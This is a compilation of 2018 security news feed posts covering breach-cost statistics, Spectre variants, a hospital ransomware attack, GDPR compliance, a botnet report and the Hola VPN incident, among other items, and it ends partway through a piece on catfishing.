Calculating the Cost of a Data Breach in 2018, the Age of AI and the IoT

Businesses run on risk: They take a chance, place their bets in the marketplace and often reap great rewards. But when thinking about the cost of a data breach, you may wonder about the price for your company and what, exactly, is at stake.

Here’s one way to think about it: You’re more likely to experience a data breach of at least 10,000 records (27.9 percent) than you are to catch the flu this winter (5–20 percent, according to WebMD). And as in the case of the flu, it’s crucial to act quickly and seek a cure for a speedy recovery. Since data breaches cost money, it’s best to take a cost-based approach to gain an accurate perspective of the problem at hand.

Sponsored by IBM Security and independently conducted by my team at the Ponemon Institute, the 13th-annual Cost of Data Breach Study includes two new factors in its analysis that influence data-breach costs: deployment of artificial intelligence (AI) and the extensive use of Internet of Things (IoT) devices.

The analysis also includes the cost of a so-called mega breach — an incident resulting in the loss of 1 million records or more — and the financial consequences of customers losing trust in your organization.

Download the complete 2018 Cost of a Data Breach Study from Ponemon Institute

The Global Cost of a Data Breach Is Up in 2018

In this year’s study, the average cost of a data breach per compromised record was $148, and it took organizations 196 days, on average, to detect a breach. Overall, we found that the total cost, per-capita cost and average size of a data breach (by number of records lost or stolen) have all increased year over year.

The average cost of a data breach increased from 2017 to 2018

Locations that experienced the most expensive data breaches include the U.S., where notification costs are nearly five times the global average, and the Middle East, which suffered the highest proportion of malicious or criminal attacks — the most expensive type of breach to identify and address. Data breaches are less expensive in Brazil and India, where detection, escalation and notification costs rank the lowest.

While the cost of a breach increased for organizations in 13 countries compared to the five-year average, it decreased in Brazil and Japan, according to this year’s report.

Based on industry and location, our data breach calculator can determine how much a security incident might cost an organization.

The Bigger the Breach, the Higher the Cost

This year’s report found that the average total cost of a breach ranges from $2.2 million for incidents with fewer than 10,000 compromised records to $6.9 million for incidents with more than 50,000 compromised records.

This graph shows the average total cost by size of the data breach for the past 3 years

But what about those massive breaches that grab national headlines? The study revealed that a mega breach (involving 1 million compromised records) could cost as much as $39.49 million. Unsurprisingly, this figure increases as the number of breached records grows. A breach involving 50 million records, for example, would result in a total cost of $350.44 million.

How Can Companies Reduce Data Breach Costs?

Among the 477 companies examined for the study, the mean time to identify a breach is still substantial (197 days), while the mean time to contain a breach is 69 days.

The good news: There are strategies to help businesses lower the potential cost of a data breach. For the fourth year running, the study found a correlation between how quickly an organization identifies and contains a breach and the total cost.

Preparation and vigilance pays: The study found that an incident response team can reduce the cost of a breach by as much as $14 per compromised record from the average per-capita cost of $148. Similarly, extensive use of encryption can cut the cost by $13 per capita.

Customer Trust Impacts the Total Cost of a Breach

Organizations around the world lost customers due to data breaches in the past year. However, businesses that worked to improve customer trust reduced the number of lost customers — thereby reducing the cost of a breach. When they deployed a senior-level leader, such as a chief privacy officer (CPO) or chief information security officer (CISO), to direct customer trust initiatives, businesses lost fewer customers and, again, minimized the financial consequences of a breach.

Additionally, organizations that offered data-breach victims identity protection kept more customers than those that did not. Companies that lost less than 1 percent of existing customers incurred an average total cost of $2.8 million — while companies that experienced a churn rate of greater than 4 percent lost $6 million on average.

Examining the Effects of AI and IoT Adoption

For the first time, this year’s study examined the effects of organizations adopting AI as part of their security automation strategy and the extensive use of IoT devices. AI security platforms save companies money — an average of $8 per compromised record — and use machine learning, analytics and orchestration to help human responders identify and contain breaches. However, only 15 percent of companies surveyed said they had fully deployed AI. Meanwhile, businesses that use IoT devices extensively pay $5 more per compromised record on average.

To get the full rundown of the potential costs associated with a data breach — and learn what you can do to help protect your business — download the 2018 Cost of Data Breach Study: Global Overview, and take a look at our accompanying infographic.

You can also use our data breach calculator to explore the industry, location and cost factors if you experience a security incident.

Download the complete 2018 Cost of a Data Breach Study from Ponemon Institute

Examine the cost of a data breach in 2018 with this data breach calculator

The post Calculating the Cost of a Data Breach in 2018, the Age of AI and the IoT appeared first on Security Intelligence.

Two New Spectre-Class CPU Flaws Discovered—Intel Pays $100K Bounty

Intel has paid out a $100,000 bug bounty for new processor vulnerabilities that are related to Spectre variant one (CVE-2017-5753). The new Spectre-class variants are tracked as Spectre 1.1 (CVE-2018-3693) and Spectre 1.2, of which Spectre 1.1 described as a bounds-check bypass store attack has been considered as more dangerous. Earlier this year, Google Project Zero researchers disclosed

Facebook Fined £500,000 by ICO for Cambridge Analytica Data Scandal

The Information Commissioner’s Office (ICO) announced its plan to fine Facebook £500,000 over the Cambridge Analytica data scandal. On 10 July, the ICO published a progress report on its investigation into the Cambridge Analytica incident. The report, entitled “Investigation into the use of data analytics in political campaigns,” explained that the ICO had sent a […]… Read More

The post Facebook Fined £500,000 by ICO for Cambridge Analytica Data Scandal appeared first on The State of Security.

Department of Commerce Report on the Botnet Threat

Last month, the US Department of Commerce released a report on the threat of botnets and what to do about it. I note that it explicitly said that the IoT makes the threat worse, and that the solutions are largely economic.

The Departments determined that the opportunities and challenges in working toward dramatically reducing threats from automated, distributed attacks can be summarized in six principal themes.

  1. Automated, distributed attacks are a global problem. The majority of the compromised devices in recent noteworthy botnets have been geographically located outside the United States. To increase the resilience of the Internet and communications ecosystem against these threats, many of which originate outside the United States, we must continue to work closely with international partners.

  2. Effective tools exist, but are not widely used. While there remains room for improvement, the tools, processes, and practices required to significantly enhance the resilience of the Internet and communications ecosystem are widely available, and are routinely applied in selected market sectors. However, they are not part of common practices for product development and deployment in many other sectors for a variety of reasons, including (but not limited to) lack of awareness, cost avoidance, insufficient technical expertise, and lack of market incentives

  3. Products should be secured during all stages of the lifecycle. Devices that are vulnerable at time of deployment, lack facilities to patch vulnerabilities after discovery, or remain in service after vendor support ends make assembling automated, distributed threats far too easy.

  4. Awareness and education are needed. Home users and some enterprise customers are often unaware of the role their devices could play in a botnet attack and may not fully understand the merits of available technical controls. Product developers, manufacturers, and infrastructure operators often lack the knowledge and skills necessary to deploy tools, processes, and practices that would make the ecosystem more resilient.

  5. Market incentives should be more effectively aligned. Market incentives do not currently appear to align with the goal of "dramatically reducing threats perpetrated by automated and distributed attacks." Product developers, manufacturers, and vendors are motivated to minimize cost and time to market, rather than to build in security or offer efficient security updates. Market incentives must be realigned to promote a better balance between security and convenience when developing products.

  6. Automated, distributed attacks are an ecosystem-wide challenge. No single stakeholder community can address the problem in isolation.

[...]

The Departments identified five complementary and mutually supportive goals that, if realized, would dramatically reduce the threat of automated, distributed attacks and improve the resilience and redundancy of the ecosystem. A list of suggested actions for key stakeholders reinforces each goal. The goals are:

  • Goal 1: Identify a clear pathway toward an adaptable, sustainable, and secure technology marketplace.
  • Goal 2: Promote innovation in the infrastructure for dynamic adaptation to evolving threats.
  • Goal 3: Promote innovation at the edge of the network to prevent, detect, and mitigate automated, distributed attacks.
  • Goal 4: Promote and support coalitions between the security, infrastructure, and operational technology communities domestically and around the world
  • Goal 5: Increase awareness and education across the ecosystem.

IoT And Your Digital Supply Chain

“Money, it’s a gas. Grab that cash with both hands and make a stash”, Pink Floyd is always near and dear to my heart. No doubt the theme song to a lot of producers of devices that fall into the category of Internet of Things or IoT.

I can’t help but to giggle at the image that comes to mind when I think about IoT manufacturers. I have this vision in my head of a wild-eyed prospector jumping around after finding a nugget of gold the size of a child’s tooth. While this imagery may cause some giggles it also gives me pause when I worry about what these gold miners are forgetting. Security comes to mind.

I know, I was shocked myself. Who saw that coming?

While there is a mad rush to stake claims across the Internet for things like connected toasters, coffee makers and adult toys it seems security falls by the way side. A lot of mistakes that were made a corrected along the way as the Internet evolved into the monster that it is today are returning. IoT appears to be following a similar trajectory but, at a far faster pace.

With this pace we see mistakes like IoT devices being rolled out with deprecated libraries and zero ability to upgraded their firmware or core software. But, no one really seems to care as they count their money while they’re still sitting at the table. The problem really comes into focus when we realize that it is the rest of us that will be left holding the bag after these manufacturers have made their money and run.

Of further concern is the fractured digital supply chains that they are relying on. I’m worried that with this dizzying pace of manufacture that miscreants and negative actors are inserting themselves into the supply chain. We have seen issues like this come to the forefront time and again. Why is it that we seem hell bent on reliving the same mistakes all over again?

One of my favorite drums to pound on is the use of deprecated, known vulnerable, libraries in their code. I’ve watched talks from numerous presenters who unearthed this sort of behavior at a fairly consistent pace. What possible rationale could there be for deploying an IoT device in 2016 with an SSL library that is vulnerable to Heartbleed?

I’ll let that sink in for a moment.

And this is by no means the worst of the lot. These products are being shipped to market with preloaded security vulnerabilities that can lead to all manner of issues. Data theft is the one that people like to carry on about a fair bit but, it would be a fairly trivial exercise to compromise some of these devices and have them added to a DDoS botnet.

What type of code review is being done a lot the way by code written by outsourced third parties? This happens a lot and really does open a company up to a risk of malicious, or poor, code being introduced.

The IoT gold rush is a concern for me from a security perspective. Various analyst firms gush about the prospect of having 800 gajillion Internet enabled devices online by next Tuesday but, they never talk about how we are going to clean up the mess later on. Someone always has to put the chairs up after the party is over.

Originally posted on CSO Online by me.

The post IoT And Your Digital Supply Chain appeared first on Liquidmatrix Security Digest.

Missouri hospital forced to divert patients after ransomware attack

A Harrisonville, Missouri-based hospital has been forced to shut down some operations and divert patients after a ransomware attack on its infrastructure and electronic health record (EHR) vendor.

Ransomware operators have shifted focus from the consumer segment to the more lucrative business sector. In recent months, bad actors have acquired a specific taste for healthcare providers.

Earlier this week, Cass Regional Medical Center – a hospital in Harrisonville, Missouri – posted a notice announcing it has fallen victim to a ransomware attack. The incident is only the latest in a long string of ransomware attacks targeting the healthcare industry in the past 12 months.

“At approximately 11 a.m. this morning, Cass Regional Medical Center became aware of a ransomware attack on its information technology infrastructure,” reads the notice, posted by the hospital on Facebook. “Affected areas include internal communication systems and access to the organization’s electronic health record (EHR). At this time, there is no evidence that patient data has been breached, but as an extra precaution, Meditech, the hospital’s EHR vendor, has opted to shut down the system until the attack is resolved.”

Hospital leadership was prompt in responding to the attack. Within half an hour of the first signs of attack, patient care managers reportedly met to devise a plan to continue to tend to patients safely and effectively. The IT department, meanwhile, called on law enforcement and cybersecurity experts to take steps toward mitigation.

To ensure optimal care for its patients, clinical leaders have decided to go on “ambulance diversion” for trauma and stroke emergencies, according to the notice. “Hospital personnel will continue to evaluate the situation and respond accordingly,” Cass Regional Medical Center said.

Details about the ransomware strain used by the attackers were not available at press time.

The GDPR Evolution: A Letter to the CISO

The long-term impact of the General Data Protection Regulation (GDPR) is on the minds of key technology leaders around the world — from Singapore to Ireland to my current home of Austin, Texas to everywhere in between. You can see this manifest in major tech publications like SecurityIntelligence (and, perhaps, in the day-to-day interactions occurring within your organization).

For me, these sentiments were echoed during a several-week, multi-continent business trip I took to visit with clients and partners in Europe and Asia. Nearly every leader we sat down with asked us how they should be shepherding their teams through the enforcement of this transformative regulation and who should lead this effort between the security and privacy teams.

This state of confusion is not surprising, especially given the hype surrounding GDPR. A recent IBM Institute of Business Value (IBV) survey found that 44 percent of executives responsible for GDPR compliance worried the regulation would be replaced or modified sometime in the near future. This perception undoubtedly muddies the waters and influences their approach to compliance.

Even with enforcement live, it’s still somewhat unclear what GDPR compliance truly means for organizations worldwide; how it will impact people, process and technology; and (even more importantly) how it will affect relationships with customers.

But one thing is abundantly clear: GDPR is here to stay.

Who Is Responsible for GDPR Compliance?

Let’s take a step back for a moment to reflect on where we started. GDPR originated as a means to help infuse a higher standard of privacy into global business practices and give data subjects from the European Union (EU) more control over their personal information — a sovereignty that was challenged somewhat by the digital data explosion of the past decade. While the regulation only technically applies to EU data subjects, it signals a shift in how we think about privacy everywhere.

This redistribution of control in favor of consumers is a good thing. As security professionals, this supports our highest calling, which is to protect personal data in the face of cyber uncertainty. Ensuring data privacy is a core component of this mission — and the spirit of GDPR supports this goal. Some organizations recognize the importance of data privacy. In fact, 59 percent of respondents to the IBV study said they see GDPR as an occasion for transformation. Still, challenges remain.

Some of the pain originates from the fact that ownership of GDPR compliance initiatives shifted between 2016 (when the legislation was passed) and May 25, 2018 (when the regulation took effect). Originally, legal teams bore the core responsibility for validating the internal processes and controls that would drive the progression toward supporting GDPR requirements. This has morphed into a discussion led by chief information officers (CIOs) and chief information security officers (CISOs) about the implementation of technical controls, the creation of special teams, the appointment of chief data officers (CDOs) and the reshaping of organizational privacy processes to support the stringent requirements, such as a customer’s right to erasure.

Today, the responsibility is shared among technical teams, as well as CIOs and CISOs, who serve as the establishers, enablers and enforcers of a comprehensive GDPR program backed by robust technical controls. This accountability will likely remain for the foreseeable future — no pressure, though.

Collaboration is a key component of GDPR success, but the transition of responsibilities between teams is a challenge. I saw this in practice when visiting Singapore several weeks ago when leaders repeatedly asked where to begin so they could be ready to answer GDPR audit inquiries, which they expect to receive very soon.

Yes, the structures were in place from the legal side to support GDPR readiness, but now it’s game time. Despite years of effort to prepare for this moment, many technology leaders are still left scratching their heads, unsure of what comes next.

What Solutions Should CISOs Invest in to Get on Track?

According to the IBV study, the number one struggle among the surveyed group was performing data discovery and ensuring data accuracy, which is a principal task of GDPR preparation (and the first step for many). This issue illustrates the complex nature of operationalizing all the plans that have been made to get us to (and, hopefully, past) this point.

This point is where technology solutions and services can provide support. Unfortunately, although many vendors might want you to believe otherwise, there’s no silver bullet to establishing GDPR readiness or enforcing the new requirements across your organization. This behemoth of a compliance regulation requires a programmatic approach, but it can often be difficult to see the forest through the trees.

My suggestion: Remember that you don’t have to reinvent the wheel.

There are countless industry frameworks — including IBM’s own GDPR framework, a continuous loop outlining five key phases for readiness — that can serve as your guide. The fact that these guidelines are based on the experiences of others can provide some peace of mind.

It’s also a great idea to leverage a trusted partner or adviser to guide you throughout your readiness and enforcement processes. Rather than going it alone, lean on the organizations that already have deep expertise in the privacy space and can use that insight to help your company avoid missteps as you implement processes and select technologies.

Finally, when it comes to implementing requisite technology controls, I would advise you to think about the regulation and follow a risk-based approach to conducting business with consumers. Consider the data you’re being asked to protect and how it relates to your customers: What personal or sensitive information does your organization hold? Where does it live? Is it actually vulnerable to compromise? Have you taken the necessary steps to put privacy and security protections into place?

As a first step toward gaining this understanding, you should investigate solutions that help identify and remediate risk, such as Guardium Analyzer, which can help you find and classify GDPR-relevant data, irrespective of where it resides (whether on-premises or in the cloud); identify vulnerabilities associated with that data; and, ultimately, prioritize existing risks and take action to remediate them.

The Secret to GDPR Compliance Is Collaboration

During my last customer visit on the trip, a CISO expressed confidence that her organization would be able to legally respond to GDPR demands. But she’s now setting up the technology teams with members from the privacy and security teams to assess and validate vulnerabilities without exposing the personally identifiable data that is deployed across multiple geographies and data center environments, both on-premises and in the cloud.

As you continue on your GDPR journey, don’t forget the importance of collaboration in making compliance happen — across teams, with business partners and even with your customers — so that you can best support the positive aims of GDPR today and in the future.

Sign Up for a 30-Day Free Trial of IBM Security Guardium Analyzer

DISCLAIMER: Clients are responsible for ensuring their own compliance with various laws and regulations, including the European Union General Data Protection Regulation. Clients are solely responsible for obtaining advice of competent legal counsel as to the identification and interpretation of any relevant laws and regulations that may affect the clients’ business and any actions the clients may need to take to comply with such laws and regulations. The products, services, and other capabilities described herein are not suitable for all client situations and may have restricted availability. IBM does not provide legal, accounting or auditing advice or represent or warrant that its services or products will ensure that clients are in compliance with any law or regulation.

Learn more about IBM’s own GDPR readiness journey and our GDPR capabilities and offerings to support your compliance journey here.

The post The GDPR Evolution: A Letter to the CISO appeared first on Security Intelligence.

Red Hat Security Advisory 2018-2167-01

Red Hat Security Advisory 2018-2167-01 - .NET Core is a managed software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET Core that address several security vulnerabilities are now available. The updated versions are .NET Core 1.0.12, 1.1.9, 2.0.9, and 2.1.2. These versions correspond to the July 2018 security release by .NET Core upstream projects.

Uncle Teeth – Application Security Weekly #23

This week, Keith and Paul talk The Hardest Problem in Application Security: Visibility. In the news, Google patches critical remote code execution bugs in Android OS, JavaScript API for face recognition in the browser with tensorflow.js, Social media apps are 'deliberately' addictive to users, and more on this episode of Application Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode23

 

Visit https://www.securityweekly.com/asw for all the latest episodes!

 

Visit https://www.activecountermeasures/asw to sign up for a demo or buy our AI Hunter!!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Malicious Software Packages Found On Arch Linux User Repository

Yet another incident which showcases that you should not explicitly trust user-controlled software repositories. One of the most popular Linux distros Arch Linux has pulled as many as three user-maintained software repository AUR packages after it was found hosting malicious code. Arch Linux is an independently developed, general-purpose GNU/Linux distribution composed predominantly of free

The Five Stages of Vulnerability Management

A key to having a good information security program within your organization is having a good vulnerability management program. Most, if not all, regulatory policies and information security frameworks advise having a strong vulnerability management program as one of the first things an organization should do when building their information security program. The Center for […]… Read More

The post The Five Stages of Vulnerability Management appeared first on The State of Security.

Hola VPN Hack Targets MyEtherWallet Users

MyEtherWallet (MEW), a well-known cryptocurrency wallet interface, used Twitter to urge MEW customers who used Hola VPN within the last 24 hours, to transfer their funds immediately to a brand new account. They said they received a report that confirms the Hola VPN Chrome extension has been hacked. MEW’s Twitter account stated the attack was logging users’ activity including sensitive information such as usernames and passwords. The details of a currently unknown number of MEW users were exposed to hackers during a five-hour window on July 9th.

Hola VPN said in a blog post that upon learning about the incident, they immediately set up a response team of cybersecurity experts to investigate the incident and prevent it from happening again. They claim they immediately took emergency steps to replace the malicious extension causing the data leak. Regular MEW users were not affected by the data breach as the MEW service was not compromised, and the incident is known to be entirely out of MEW developers’ control. However, the breach certainly throws a shadow at the Israeli VPN service provider.

This is not the first time MEW users are being targeted. Earlier this year hackers managed to snatch more than $300,000 through execution of a sophisticated DNS hijacking attack. Many users lost their funds forever. Services such as MyEtherWallet do not operate like banks –  they do not charge transactions fees, they do not offer insurance, and they do not store cryptocurrency. Instead, they provide users with an interface that allows their clients to interact directly with the blockchain. Hugely unregulated and still in its wild west years, blockchain is like a vast, global, decentralized spreadsheet, and users are the only one responsible for the funds they store on such virtual wallet interfaces.

How to protect yourself?

First and foremost, use common sense and make sure that the sites you are visiting are legitimate. If you are a MEW user, your website needs to be https://www.myetherwallet.com. Even if a single letter in the URL is changed, you are not in the correct place, and you are being phished.

Avoid opening websites that feel sketchy, or you do not trust – clicking on random links you see on social media may end up forwarding you to malicious sites. If you want to access a specific website, open a new tab on your browser and type the correct link manually. Navigating directly to the website decreases the chances of ending up on a phishing website.

Do not use the same password on other websites. One of the worst cybersecurity practices is to use the same password on multiple sites. If you struggle to remember your passwords, use tools that allow you to keep them safe and protected, or write them on a piece of paper. Make sure to change your passwords every three months – sometimes it takes years for companies to announce that they have been hacked.

Lastly, make sure that you have antivirus software installed on all your connected devices, and you deal with reliable VPN service providers. As in real life, cheap (or free) sometimes end up costing more. Quality VPNs encrypt your web traffic, do not allow hackers to monitor your online activity and do not let cybercriminals re-route your web traffic to phishing websites. Stay safe!

Download Panda FREE VPN

The post Hola VPN Hack Targets MyEtherWallet Users appeared first on Panda Security Mediacenter.

Plenty of catfish in the sea

Online dating apps back in 2012 weren’t the torrent of swipes, profiles, bots, and inane hook up lines that they are today, but they did bring us a fascinating new use of social media: a phenomenon called catfishing.

A "catfish" is a person who creates fake personal profiles on social media sites using someone